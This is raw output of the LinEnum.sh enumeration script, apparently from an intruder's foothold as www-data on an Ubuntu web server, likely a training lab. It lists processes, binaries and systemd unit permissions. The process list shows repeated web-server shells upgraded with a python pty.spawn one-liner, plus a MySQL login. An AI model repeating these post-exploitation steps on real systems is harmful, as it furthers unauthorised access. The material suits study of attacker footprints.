root        2255  0.0  0.0   2608   592 pts/0    S    18:24   0:00 /bin/sh /usr/bin/sensible-pager
root        2257  0.0  0.0   5836  2600 pts/0    S    18:24   0:00 pager
root        2260  0.0  0.0   2608   532 pts/0    S    18:24   0:00 sh -c /bin/bash -c /bin/bash
root        2261  0.0  0.0   7236  3972 pts/0    S+   18:24   0:00 /bin/bash
www-data    2300  0.0  0.0      0     0 ?        Z    18:28   0:00 [sh] <defunct>
root        2456  0.0  0.0      0     0 ?        I    18:34   0:00 [kworker/0:1]
www-data    7732  0.0  0.0   2608   600 ?        S    18:36   0:00 sh -c sh
www-data    7733  0.0  0.0   2608   536 ?        S    18:36   0:00 sh
www-data    7734  0.0  0.2  15956  9468 ?        S    18:37   0:00 python3 -c import pty; pty.spawn("/bin/sh")
www-data    7735  0.0  0.0   2608   596 pts/2    Ss   18:37   0:00 /bin/sh
www-data    7736  0.0  0.0   7304  3752 pts/2    S+   18:37   0:00 bash
root        7829  0.0  0.0      0     0 ?        I    18:40   0:00 [kworker/u4:2-events_unbound]
root        7894  0.0  0.0      0     0 ?        I    18:42   0:00 [kworker/1:2-events]
www-data    7919  0.0  0.0   2608   532 ?        S    18:42   0:00 sh -c sh
www-data    7920  0.0  0.0   2608   528 ?        S    18:42   0:00 sh
www-data    7921  0.0  0.2  16084  9524 ?        S    18:42   0:00 python3 -c import pty; pty.spawn("/bin/sh")
www-data    7922  0.0  0.0   2608   592 pts/3    Ss   18:42   0:00 /bin/sh
www-data    7923  0.0  0.0   7304  3764 pts/3    S    18:42   0:00 bash
root       24815  0.0  0.0      0     0 ?        I    18:47   0:00 [kworker/u4:0-events_power_efficient]
www-data   25342  0.0  0.1   9524  4812 pts/3    S+   18:49   0:00 /usr/local/sbin/laurel
www-data   25353  0.0  0.0   2608   536 ?        S    18:51   0:00 sh -c sh
www-data   25354  0.0  0.0   2608   592 ?        S    18:51   0:00 sh
www-data   25355  0.0  0.2  15956  9352 ?        S    18:51   0:00 python3 -c import pty; pty.spawn("/bin/sh")
www-data   25356  0.0  0.0   2608   532 pts/4    Ss   18:51   0:00 /bin/sh
www-data   25358  0.0  0.0   7304  3824 pts/4    S    18:52   0:00 bash
root       25369  0.0  0.0      0     0 ?        I    18:53   0:00 [kworker/u4:1-flush-8:0]
www-data   25372  0.0  0.2  22804 11324 pts/4    S+   18:53   0:00 mysql -h 127.0.0.1 -u lewis -p
www-data   25376  0.0  0.0   4768  3792 ?        S    18:54   0:00 /bin/bash ./LinEnum.sh
www-data   25377  0.0  0.0   4900  2832 ?        S    18:54   0:00 /bin/bash ./LinEnum.sh
www-data   25378  0.0  0.0   2516   576 ?        S    18:54   0:00 tee -a
root       25575  0.0  0.0  22656  3784 ?        S    18:54   0:00 /lib/systemd/systemd-udevd
root       25577  0.0  0.0      0     0 ?        I    18:54   0:00 [kworker/1:1-events]
www-data   25583  0.0  0.0   4900  2656 ?        S    18:54   0:00 /bin/bash ./LinEnum.sh
www-data   25584  0.0  0.0   5892  2908 ?        R    18:54   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1183448 Apr 18  2022 /bin/bash
lrwxrwxrwx 1 root root        4 Apr 23  2020 /bin/sh -> dash
-rwxr-xr-x 1 root root  1620224 Mar 27  2023 /lib/systemd/systemd
-rwxr-xr-x 1 root root   162032 Mar 27  2023 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   268576 Mar 27  2023 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root   415968 Mar 27  2023 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root    55520 Mar 27  2023 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   760392 Mar 27  2023 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    69000 May 30  2023 /sbin/agetty
-rwxr-xr-x 1 root root   112936 Feb 18  2020 /sbin/auditd
-rwxr-xr-x 1 root root   521200 Jan 31  2023 /sbin/dhclient
lrwxrwxrwx 1 root root       20 Mar 27  2023 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   129224 Jul 24 23:06 /sbin/multipathd
-rwxr-xr-x 1 root root   141856 Oct 27 11:51 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root   249032 Oct 25  2022 /usr/bin/dbus-daemon
lrwxrwxrwx 1 root root        9 Mar 13  2020 /usr/bin/python3 -> python3.8
-rwxr-xr-x 1 root root    76352 Oct 27 11:51 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root   203192 Jun 20 11:26 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root   121504 Feb 21  2022 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root   483056 Sep  6  2021 /usr/lib/udisks2/udisksd
-rwxr-xr-x 1 root root  7286984 Oct 26 15:04 /usr/local/sbin/laurel
-rwxr-xr-x 1 root root  1915728 Apr  8  2022 /usr/sbin/ModemManager
-rwxr-xr-x 1 root root    30728 Nov 12  2018 /usr/sbin/atd
-rwxr-xr-x 1 root root    55944 Feb 13  2020 /usr/sbin/cron
-rwxr-xr-x 1 root root    64432 Feb 13  2020 /usr/sbin/irqbalance
-rwxr-xr-x 1 root root 67262616 Oct 25 17:34 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   727248 May  3  2022 /usr/sbin/rsyslogd


[-] /etc/init.d/ binary permissions:
total 168
drwxr-xr-x   2 root root 4096 Nov 21 10:56 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rwxr-xr-x   1 root root 5574 Nov  5  2019 alsa-utils
-rwxr-xr-x   1 root root 3740 Apr  1  2020 apparmor
-rwxr-xr-x   1 root root 2964 Dec  6  2019 apport
-rwxr-xr-x   1 root root 1071 Jul 24  2018 atd
-rwxr-xr-x   1 root root 3617 Aug 12  2019 auditd
-rwxr-xr-x   1 root root 1232 Mar 27  2020 console-setup.sh
-rwxr-xr-x   1 root root 3059 Feb 11  2020 cron
-rwxr-xr-x   1 root root  937 Feb  4  2020 cryptdisks
-rwxr-xr-x   1 root root  896 Feb  4  2020 cryptdisks-early
-rwxr-xr-x   1 root root 3152 Sep 30  2019 dbus
-rwxr-xr-x   1 root root  985 Apr 15  2020 grub-common
-rwxr-xr-x   1 root root 3809 Jul 28  2019 hwclock.sh
-rwxr-xr-x   1 root root 2638 Dec 13  2019 irqbalance
-rwxr-xr-x   1 root root 1503 Apr  1  2019 iscsid
-rwxr-xr-x   1 root root 1479 Nov 27  2019 keyboard-setup.sh
-rwxr-xr-x   1 root root 2044 Feb 19  2020 kmod
-rwxr-xr-x   1 root root  695 Jan 28  2020 lvm2
-rwxr-xr-x   1 root root  586 Jan 28  2020 lvm2-lvmpolld
-rwxr-xr-x   1 root root 5607 Jun 14 19:23 mysql
-rwxr-xr-x   1 root root 4445 Jan 29  2019 networking
-rwxr-xr-x   1 root root 4579 Feb  4  2019 nginx
-rwxr-xr-x   1 root root 2503 Apr  1  2019 open-iscsi
-rwxr-xr-x   1 root root 1846 Mar  9  2020 open-vm-tools
-rwxr-xr-x   1 root root 4294 Jun 27 15:49 php7.4-fpm
-rwxr-xr-x   1 root root 1366 Mar 23  2020 plymouth
-rwxr-xr-x   1 root root  752 Mar 23  2020 plymouth-log
-rwxr-xr-x   1 root root  924 Feb 13  2020 procps
-rwxr-xr-x   1 root root 4417 Oct 15  2019 rsync
-rwxr-xr-x   1 root root 2864 Mar  7  2019 rsyslog
-rwxr-xr-x   1 root root 1222 Apr  2  2017 screen-cleanup
-rwxr-xr-x   1 root root 3939 Feb 26  2020 ssh
-rwxr-xr-x   1 root root 6872 Apr 22  2020 udev
-rwxr-xr-x   1 root root 1306 Apr  2  2020 uuidd


[-] /etc/init/ config file permissions:
total 12
drwxr-xr-x   2 root root 4096 Nov 21 10:55 .
drwxr-xr-x 106 root root 4096 Nov 21 10:56 ..
-rw-r--r--   1 root root 1757 Jun 14 19:23 mysql.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.7M
drwxr-xr-x 25 root root  36K Nov 21 10:59 system
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 system-shutdown
drwxr-xr-x  4 root root 4.0K Oct 26 15:12 user
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 system-preset
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 catalog
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 user-environment-generators
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 user-preset
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 system-generators
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 network
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 ntp-units.d
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 system-sleep
drwxr-xr-x  3 root root 4.0K Oct 26 15:12 boot
drwxr-xr-x  2 root root 4.0K Oct 26 15:12 user-generators
-rw-r--r--  1 root root 2.4M Mar 27  2023 libsystemd-shared-245.so
-rw-r--r--  1 root root  701 Mar 27  2023 resolv.conf
-rwxr-xr-x  1 root root 1.3K Mar 27  2023 set-cpufreq
-rwxr-xr-x  1 root root 1.6M Mar 27  2023 systemd
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-ac-power
-rwxr-xr-x  1 root root  27K Mar 27  2023 systemd-backlight
-rwxr-xr-x  1 root root  19K Mar 27  2023 systemd-binfmt
-rwxr-xr-x  1 root root  31K Mar 27  2023 systemd-bless-boot
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-boot-check-no-failures
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-cgroups-agent
-rwxr-xr-x  1 root root  35K Mar 27  2023 systemd-cryptsetup
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-dissect
-rwxr-xr-x  1 root root  27K Mar 27  2023 systemd-fsck
-rwxr-xr-x  1 root root  31K Mar 27  2023 systemd-fsckd
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-growfs
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-hibernate-resume
-rwxr-xr-x  1 root root  35K Mar 27  2023 systemd-hostnamed
-rwxr-xr-x  1 root root  19K Mar 27  2023 systemd-initctl
-rwxr-xr-x  1 root root 159K Mar 27  2023 systemd-journald
-rwxr-xr-x  1 root root  43K Mar 27  2023 systemd-localed
-rwxr-xr-x  1 root root 263K Mar 27  2023 systemd-logind
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-makefs
-rwxr-xr-x  1 root root  19K Mar 27  2023 systemd-modules-load
-rwxr-xr-x  1 root root  35K Mar 27  2023 systemd-network-generator
-rwxr-xr-x  1 root root 2.2M Mar 27  2023 systemd-networkd
-rwxr-xr-x  1 root root  31K Mar 27  2023 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-pstore
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-quotacheck
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-random-seed
-rwxr-xr-x  1 root root  19K Mar 27  2023 systemd-remount-fs
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-reply-password
-rwxr-xr-x  1 root root 407K Mar 27  2023 systemd-resolved
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-rfkill
-rwxr-xr-x  1 root root  55K Mar 27  2023 systemd-shutdown
-rwxr-xr-x  1 root root  27K Mar 27  2023 systemd-sleep
-rwxr-xr-x  1 root root  31K Mar 27  2023 systemd-socket-proxyd
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-sulogin-shell
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-sysctl
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-time-wait-sync
-rwxr-xr-x  1 root root  47K Mar 27  2023 systemd-timedated
-rwxr-xr-x  1 root root  55K Mar 27  2023 systemd-timesyncd
-rwxr-xr-x  1 root root 743K Mar 27  2023 systemd-udevd
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-update-utmp
-rwxr-xr-x  1 root root  23K Mar 27  2023 systemd-user-runtime-dir
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-user-sessions
-rwxr-xr-x  1 root root  15K Mar 27  2023 systemd-veritysetup
-rwxr-xr-x  1 root root  19K Mar 27  2023 systemd-volatile-root
-rwxr-xr-x  1 root root 1.4K Feb 16  2022 systemd-sysv-install

/lib/systemd/system:
total 1.2M
-rw-r--r-- 1 root root  747 Nov  7 14:23 apt-news.service
-rw-r--r-- 1 root root  688 Nov  7 14:23 esm-cache.service
-rw-r--r-- 1 root root  830 Nov  7 14:23 ua-reboot-cmds.service
-rw-r--r-- 1 root root  640 Nov  7 14:23 ua-timer.service
-rw-r--r-- 1 root root  322 Nov  7 14:23 ua-timer.timer
-rw-r--r-- 1 root root 1.4K Nov  7 14:23 ubuntu-advantage.service
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 sound.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 system-update.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 getty.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 timers.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 user-.slice.d
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 user@.service.d
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 halt.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Oct 26 15:12 runlevel5.target.wants
-rw-r--r-- 1 root root  389 Oct  6 09:42 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Oct  6 09:42 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  326 Oct  6 09:42 apt-daily.service
-rw-r--r-- 1 root root  156 Oct  6 09:42 apt-daily.timer
-rw-r--r-- 1 root root  255 Sep  1 18:38 rsync.service
lrwxrwxrwx 1 root root    9 Jul 24 23:06 multipath-tools-boot.service -> /dev/null
lrwxrwxrwx 1 root root   18 Jul 24 23:06 multipath-tools.service -> multipathd.service
-rw-r--r-- 1 root root  807 Jul 24 23:06 multipathd.service
-rw-r--r-- 1 root root  186 Jul 24 23:06 multipathd.socket
-rw-r--r-- 1 root root  523 Jun 27 15:49 php7.4-fpm.service
-rw-r--r-- 1 root root  741 Jun 20 11:26 accounts-daemon.service
-rw-r--r-- 1 root root  529 Jun 14 19:30 mysql.service
-rw-r--r-- 1 root root  466 May 30  2023 fstrim.service
-rw-r--r-- 1 root root  205 May 30  2023 fstrim.timer
-rw-r--r-- 1 root root  538 May 30  2023 uuidd.service
-rw-r--r-- 1 root root  126 May 30  2023 uuidd.socket
-rw-r--r-- 1 root root  406 May 11  2023 fwupd-offline-update.service
-rw-r--r-- 1 root root  450 May 11  2023 fwupd-refresh.service
-rw-r--r-- 1 root root  650 May 11  2023 fwupd.service
lrwxrwxrwx 1 root root    9 Apr  4  2023 sudo.service -> /dev/null
-rw-r--r-- 1 root root  184 Apr  3  2023 rescue-ssh.target
-rw-r--r-- 1 root root  538 Apr  3  2023 ssh.service
-rw-r--r-- 1 root root  216 Apr  3  2023 ssh.socket
-rw-r--r-- 1 root root  318 Apr  3  2023 ssh@.service
lrwxrwxrwx 1 root root   14 Mar 27  2023 autovt@.service -> getty@.service
-rw-r--r-- 1 root root 1.1K Mar 27  2023 console-getty.service
-rw-r--r-- 1 root root 1.3K Mar 27  2023 container-getty@.service
lrwxrwxrwx 1 root root    9 Mar 27  2023 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Mar 27  2023 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Mar 27  2023 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Mar 27  2023 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Mar 27  2023 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Mar 27  2023 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   25 Mar 27  2023 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Mar 27  2023 debug-shell.service
lrwxrwxrwx 1 root root   16 Mar 27  2023 default.target -> graphical.target
-rw-r--r-- 1 root root  797 Mar 27  2023 emergency.service
-rw-r--r-- 1 root root  342 Mar 27  2023 getty-static.service
-rw-r--r-- 1 root root 2.0K Mar 27  2023 getty@.service
lrwxrwxrwx 1 root root    9 Mar 27  2023 hwclock.service -> /dev/null
-rw-r--r-- 1 root root  716 Mar 27  2023 kmod-static-nodes.service
lrwxrwxrwx 1 root root   28 Mar 27  2023 kmod.service -> systemd-modules-load.service
-rw-r--r-- 1 root root  601 Mar 27  2023 modprobe@.service
-rw-r--r-- 1 root root  362 Mar 27  2023 ondemand.service
lrwxrwxrwx 1 root root   22 Mar 27  2023 procps.service -> systemd-sysctl.service
-rw-r--r-- 1 root root  609 Mar 27  2023 quotaon.service
-rw-r--r-- 1 root root  716 Mar 27  2023 rc-local.service
lrwxrwxrwx 1 root root    9 Mar 27  2023 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Mar 27  2023 rcS.service -> /dev/null
-rw-r--r-- 1 root root  788 Mar 27  2023 rescue.service
lrwxrwxrwx 1 root root   15 Mar 27  2023 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Mar 27  2023 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Mar 27  2023 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Mar 27  2023 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Mar 27  2023 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Mar 27  2023 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Mar 27  2023 runlevel6.target -> reboot.target
-rw-r--r-- 1 root root 1.5K Mar 27  2023 serial-getty@.service
-rw-r--r-- 1 root root  830 Mar 27  2023 sys-kernel-config.mount
-rw-r--r-- 1 root root  719 Mar 27  2023 systemd-backlight@.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-binfmt.service
-rw-r--r-- 1 root root  678 Mar 27  2023 systemd-bless-boot.service
-rw-r--r-- 1 root root  718 Mar 27  2023 systemd-boot-check-no-failures.service
-rw-r--r-- 1 root root  740 Mar 27  2023 systemd-fsck-root.service
-rw-r--r-- 1 root root  741 Mar 27  2023 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Mar 27  2023 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Mar 27  2023 systemd-fsckd.socket
-rw-r--r-- 1 root root  671 Mar 27  2023 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  541 Mar 27  2023 systemd-hibernate.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-hostnamed.service
-rw-r--r-- 1 root root  813 Mar 27  2023 systemd-hwdb-update.service
-rw-r--r-- 1 root root  559 Mar 27  2023 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  566 Mar 27  2023 systemd-initctl.service
-rw-r--r-- 1 root root  686 Mar 27  2023 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.6K Mar 27  2023 systemd-journald.service
-rw-r--r-- 1 root root 1.5K Mar 27  2023 systemd-journald@.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-localed.service
-rw-r--r-- 1 root root 2.1K Mar 27  2023 systemd-logind.service
-rw-r--r-- 1 root root 1.1K Mar 27  2023 systemd-modules-load.service
-rw-r--r-- 1 root root  635 Mar 27  2023 systemd-network-generator.service
-rw-r--r-- 1 root root  740 Mar 27  2023 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 2.0K Mar 27  2023 systemd-networkd.service
-rw-r--r-- 1 root root 1.1K Mar 27  2023 systemd-pstore.service
-rw-r--r-- 1 root root  655 Mar 27  2023 systemd-quotacheck.service
-rw-r--r-- 1 root root 1.1K Mar 27  2023 systemd-random-seed.service
-rw-r--r-- 1 root root  767 Mar 27  2023 systemd-remount-fs.service
-rw-r--r-- 1 root root 1.7K Mar 27  2023 systemd-resolved.service
-rw-r--r-- 1 root root  717 Mar 27  2023 systemd-rfkill.service
-rw-r--r-- 1 root root  596 Mar 27  2023 systemd-suspend-then-hibernate.service
-rw-r--r-- 1 root root  537 Mar 27  2023 systemd-suspend.service
-rw-r--r-- 1 root root  693 Mar 27  2023 systemd-sysctl.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-time-wait-sync.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-timedated.service
-rw-r--r-- 1 root root 1.5K Mar 27  2023 systemd-timesyncd.service
-rw-r--r-- 1 root root 1.2K Mar 27  2023 systemd-udevd.service
-rw-r--r-- 1 root root  797 Mar 27  2023 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  794 Mar 27  2023 systemd-update-utmp.service
-rw-r--r-- 1 root root  628 Mar 27  2023 systemd-user-sessions.service
-rw-r--r-- 1 root root  690 Mar 27  2023 systemd-volatile-root.service
lrwxrwxrwx 1 root root   21 Mar 27  2023 udev.service -> systemd-udevd.service
-rw-r--r-- 1 root root  688 Mar 27  2023 user-runtime-dir@.service
-rw-r--r-- 1 root root  748 Mar 27  2023 user@.service
lrwxrwxrwx 1 root root    9 Mar 27  2023 x11-common.service -> /dev/null
-rw-r--r-- 1 root root  408 Dec 18  2022 grub-initrd-fallback.service
-rw-r--r-- 1 root root  583 Dec  2  2022 grub-common.service
-rw-r--r-- 1 root root  505 Oct 25  2022 dbus.service
-rw-r--r-- 1 root root  106 Oct 25  2022 dbus.socket
-rw-r--r-- 1 root root  642 Sep 16  2022 bolt.service
-rw-r--r-- 1 root root  489 Sep  8  2022 open-vm-tools.service
-rw-r--r-- 1 root root  408 Sep  8  2022 vgauth.service
-rw-r--r-- 1 root root  194 Jul 25  2022 fwupd-refresh.timer
-rw-r--r-- 1 root root  438 Jun  2  2022 e2scrub@.service
-rw-r--r-- 1 root root  297 Jun  2  2022 e2scrub_all.service
-rw-r--r-- 1 root root  251 Jun  2  2022 e2scrub_all.timer
-rw-r--r-- 1 root root  245 Jun  2  2022 e2scrub_fail@.service
-rw-r--r-- 1 root root  550 Jun  2  2022 e2scrub_reap.service
-rw-r--r-- 1 root root  258 May  4  2022 networkd-dispatcher.service
-rw-r--r-- 1 root root  435 May  3  2022 rsyslog.service
-rw-r--r-- 1 root root  480 Apr  8  2022 ModemManager.service
-rw-r--r-- 1 root root  169 Sep  6  2021 clean-mount-point@.service
-rw-r--r-- 1 root root  203 Sep  6  2021 udisks2.service
-rw-r--r-- 1 root root  290 Aug 31  2021 thermald.service
-rw-r--r-- 1 root root  613 Apr 14  2021 alsa-restore.service
-rw-r--r-- 1 root root  565 Apr 14  2021 alsa-state.service
lrwxrwxrwx 1 root root    9 Apr 14  2021 alsa-utils.service -> /dev/null
-rw-r--r-- 1 root root  175 Mar 18  2021 iscsid.socket
-rw-r--r-- 1 root root  404 Feb  9  2021 pollinate.service
-rw-r--r-- 1 root root  987 Jan 19  2021 open-iscsi.service
-rw-r--r-- 1 root root  463 Jan 19  2021 iscsid.service
-rw-r--r-- 1 root root  447 Nov  2  2020 plymouth-halt.service
-rw-r--r-- 1 root root  461 Nov  2  2020 plymouth-kexec.service
lrwxrwxrwx 1 root root   27 Nov  2  2020 plymouth-log.service -> plymouth-read-write.service
-rw-r--r-- 1 root root  456 Nov  2  2020 plymouth-poweroff.service
-rw-r--r-- 1 root root  200 Nov  2  2020 plymouth-quit-wait.service
-rw-r--r-- 1 root root  194 Nov  2  2020 plymouth-quit.service
-rw-r--r-- 1 root root  244 Nov  2  2020 plymouth-read-write.service
-rw-r--r-- 1 root root  449 Nov  2  2020 plymouth-reboot.service
-rw-r--r-- 1 root root  567 Nov  2  2020 plymouth-start.service
-rw-r--r-- 1 root root  291 Nov  2  2020 plymouth-switch-root.service
lrwxrwxrwx 1 root root   21 Nov  2  2020 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  525 Nov  2  2020 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  502 Nov  2  2020 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  481 Sep 28  2020 mdadm-grow-continue@.service
-rw-r--r-- 1 root root  210 Sep 28  2020 mdadm-last-resort@.service
-rw-r--r-- 1 root root  179 Sep 28  2020 mdadm-last-resort@.timer
-rw-r--r-- 1 root root  535 Sep 28  2020 mdcheck_continue.service
-rw-r--r-- 1 root root  435 Sep 28  2020 mdcheck_continue.timer
-rw-r--r-- 1 root root  483 Sep 28  2020 mdcheck_start.service
-rw-r--r-- 1 root root  463 Sep 28  2020 mdcheck_start.timer
-rw-r--r-- 1 root root 1.1K Sep 28  2020 mdmon@.service
-rw-r--r-- 1 root root  463 Sep 28  2020 mdmonitor-oneshot.service
-rw-r--r-- 1 root root  434 Sep 28  2020 mdmonitor-oneshot.timer
-rw-r--r-- 1 root root  388 Sep 28  2020 mdmonitor.service
-rw-r--r-- 1 root root  407 Sep 23  2020 packagekit-offline-update.service
-rw-r--r-- 1 root root  371 Sep 23  2020 packagekit.service
-rw-r--r-- 1 root root  396 Sep 10  2020 finalrd.service
-rw-r--r-- 1 root root  173 Jun 15  2020 motd-news.service
-rw-r--r-- 1 root root  161 Jun 15  2020 motd-news.timer
lrwxrwxrwx 1 root root    9 Apr 23  2020 screen-cleanup.service -> /dev/null
-rw-r--r-- 1 root root 1.2K Apr 10  2020 apparmor.service
-rw-r--r-- 1 root root  919 Apr  1  2020 basic.target
-rw-r--r-- 1 root root  441 Apr  1  2020 blockdev@.target
-rw-r--r-- 1 root root  419 Apr  1  2020 bluetooth.target
-rw-r--r-- 1 root root  455 Apr  1  2020 boot-complete.target
-rw-r--r-- 1 root root  465 Apr  1  2020 cryptsetup-pre.target
-rw-r--r-- 1 root root  412 Apr  1  2020 cryptsetup.target
-rw-r--r-- 1 root root  750 Apr  1  2020 dev-hugepages.mount
-rw-r--r-- 1 root root  693 Apr  1  2020 dev-mqueue.mount
-rw-r--r-- 1 root root  471 Apr  1  2020 emergency.target
-rw-r--r-- 1 root root  541 Apr  1  2020 exit.target
-rw-r--r-- 1 root root  480 Apr  1  2020 final.target
-rw-r--r-- 1 root root  506 Apr  1  2020 getty-pre.target
-rw-r--r-- 1 root root  500 Apr  1  2020 getty.target
-rw-r--r-- 1 root root  598 Apr  1  2020 graphical.target
-rw-r--r-- 1 root root  527 Apr  1  2020 halt.target
-rw-r--r-- 1 root root  509 Apr  1  2020 hibernate.target
-rw-r--r-- 1 root root  530 Apr  1  2020 hybrid-sleep.target
-rw-r--r-- 1 root root  665 Apr  1  2020 initrd-cleanup.service
-rw-r--r-- 1 root root  528 Apr  1  2020 initrd-fs.target
-rw-r--r-- 1 root root  815 Apr  1  2020 initrd-parse-etc.service
-rw-r--r-- 1 root root  496 Apr  1  2020 initrd-root-device.target
-rw-r--r-- 1 root root  501 Apr  1  2020 initrd-root-fs.target
-rw-r--r-- 1 root root  584 Apr  1  2020 initrd-switch-root.service
-rw-r--r-- 1 root root  777 Apr  1  2020 initrd-switch-root.target
-rw-r--r-- 1 root root  813 Apr  1  2020 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  698 Apr  1  2020 initrd.target
-rw-r--r-- 1 root root  541 Apr  1  2020 kexec.target
-rw-r--r-- 1 root root  435 Apr  1  2020 local-fs-pre.target
-rw-r--r-- 1 root root  482 Apr  1  2020 local-fs.target
-rw-r--r-- 1 root root  445 Apr  1  2020 machine.slice
-rw-r--r-- 1 root root  532 Apr  1  2020 multi-user.target
-rw-r--r-- 1 root root  505 Apr  1  2020 network-online.target
-rw-r--r-- 1 root root  502 Apr  1  2020 network-pre.target
-rw-r--r-- 1 root root  521 Apr  1  2020 network.target
-rw-r--r-- 1 root root  554 Apr  1  2020 nss-lookup.target
-rw-r--r-- 1 root root  513 Apr  1  2020 nss-user-lookup.target
-rw-r--r-- 1 root root  394 Apr  1  2020 paths.target
-rw-r--r-- 1 root root  592 Apr  1  2020 poweroff.target
-rw-r--r-- 1 root root  417 Apr  1  2020 printer.target
-rw-r--r-- 1 root root  745 Apr  1  2020 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  718 Apr  1  2020 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  583 Apr  1  2020 reboot.target
-rw-r--r-- 1 root root  549 Apr  1  2020 remote-cryptsetup.target
-rw-r--r-- 1 root root  436 Apr  1  2020 remote-fs-pre.target
-rw-r--r-- 1 root root  522 Apr  1  2020 remote-fs.target
